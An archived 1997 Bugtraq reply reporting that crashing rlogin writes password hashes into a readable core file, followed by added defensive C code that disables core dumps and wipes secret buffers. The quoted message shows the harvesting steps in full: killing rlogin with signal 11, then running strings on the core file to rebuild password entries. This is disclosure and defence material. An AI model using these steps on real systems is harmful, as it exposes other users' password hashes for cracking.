[4060] in bugtraq
Re: FreeBSD,rlogin and coredumps.
daemon@ATHENA.MIT.EDU (Michael Lerperger)
Mon Feb 17 18:30:01 1997
Date: Mon, 17 Feb 1997 15:22:10 -0500
Reply-To: Michael Lerperger <lerperg@HUSC.HARVARD.EDU>
From: Michael Lerperger <lerperg@HUSC.HARVARD.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.BSF.3.91.970217010740.6489A-100000@wips.nanoteq.co.za>
This behavior is reproducible on HPUX v9.3 Series 700 machines with the
rlogin cumulative patch PHNE_8805 installed. It was possible to extract
about 265 encrypted user passwords from the core file.
rlogind is disabled now on all HPUX v9.3 systems over here.
-Michael
>
> I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
> playing around with dump files:
>
> ~> rlogin 127.0.0.1
> Password:
> Last login: Mon Feb 17 00:35:49 from localhost
> Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
> The Regents of the University of California. All rights reserved.
>
> FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
>
> You have new mail.
>
> ~> ps -ax | grep rlogin
> 6528 ?? S 0:00.06 rlogind
> 6527 p1 S+ 0:00.05 rlogin 127.0.0.1
> 6529 p1 S+ 0:00.01 rlogin 127.0.0.1
>
> ~> kill -11 6529
> ~> ls
> Brain_Box NS cronjobs mail security
> Mail News foon rlogin.core
> ~> strings rlogin.core > unshadowed.passwdfile.reconstruct
> ~> vi unshadowed.passwdfile.reconstruct
> and reconstruct..
>
> I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
> wonder if there is a way to make a core dump only readable by root, and why
> this isn't the default?
>
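The question at the end of the quoted post (core files of a set-uid program readable by the user who crashed it) was later answered in the kernel: FreeBSD's kern.sugid_coredump sysctl and Linux's fs.suid_dumpable both default to 0, so a process that has changed credentials does not dump core at all. A program that copies password hashes into its own memory can also protect itself, independent of the kernel setting. The C below is an added example written for this page, not code from the thread or from rlogin: it refuses core files for the process before touching any secret, wipes the working buffer in a way the optimizer cannot remove, and reports how many hash bytes survived. The 13-character string standing in for a DES crypt(3) hash is constructed for the example.

```c
/* Added example, not part of the Bugtraq thread. Shows how a program that
 * handles password hashes keeps them out of a core file. Assumes POSIX
 * setrlimit(2); prctl(2) is used only on Linux. */
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <sys/resource.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Forbid core files for this process. Call this before any secret is read.
 * Lowering RLIMIT_CORE to 0 never needs privilege. Returns 0 on success. */
int disable_core_dumps(void) {
    struct rlimit rl = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
#ifdef __linux__
    /* Also mark the process non-dumpable so a core_pattern pipe helper
     * does not receive the image either. */
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;
#endif
    return 0;
}

/* 1 if the soft RLIMIT_CORE of this process is zero, else 0. */
int core_dumps_disabled(void) {
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0)
        return 0;
    return rl.rlim_cur == 0;
}

/* Overwrite a buffer through a volatile pointer so the stores are not
 * optimized away as "dead" writes to a buffer that is about to go out of scope. */
void wipe(void *p, size_t n) {
    volatile unsigned char *vp = p;
    while (n--)
        *vp++ = 0;
}

/* Count bytes that are still non-zero; used to prove the wipe happened. */
static int nonzero_bytes(const unsigned char *p, size_t n) {
    int count = 0;
    for (size_t i = 0; i < n; i++)
        if (p[i])
            count++;
    return count;
}

/* Constructed stand-in for a 13-character DES crypt(3) hash that a program
 * like rlogin would have copied out of the password database. */
static const char SAMPLE_HASH[] = "ab/cDe1F2gH3i";

/* Simulate a credential check: copy the stored hash into a working buffer,
 * compare it with the candidate, then wipe the buffer before returning.
 * Returns 1 on match, 0 otherwise; *residue receives the number of non-zero
 * bytes left in the buffer after wiping (expected: 0). */
int check_and_wipe(const char *candidate_hash, int *residue) {
    char work[64];
    strncpy(work, SAMPLE_HASH, sizeof work - 1);
    work[sizeof work - 1] = '\0';
    int match = strcmp(work, candidate_hash) == 0;
    wipe(work, sizeof work);
    *residue = nonzero_bytes((const unsigned char *)work, sizeof work);
    return match;
}

int main(int argc, char **argv) {
    int residue = 0;
    if (disable_core_dumps() != 0) {
        perror("disable_core_dumps");
        return 1;
    }
    int ok = check_and_wipe("ab/cDe1F2gH3i", &residue);
    printf("match=%d residue_bytes=%d core_disabled=%d\n",
           ok, residue, core_dumps_disabled());
    /* With "--crash", fault on purpose the way the quoted post did with
     * kill -11: no core file should appear in the working directory. */
    if (argc > 1 && strcmp(argv[1], "--crash") == 0)
        raise(SIGSEGV);
    return 0;
}
```

Run it once normally and once with `--crash` and check with `ls` that no core file is written. The limit and the wipe address different exposures: RLIMIT_CORE stops the whole image being written to disk, while wiping limits what a later bug, a debugger attached by the same user, or a dump taken despite the limit could find, so both belong in a program that has read a password database.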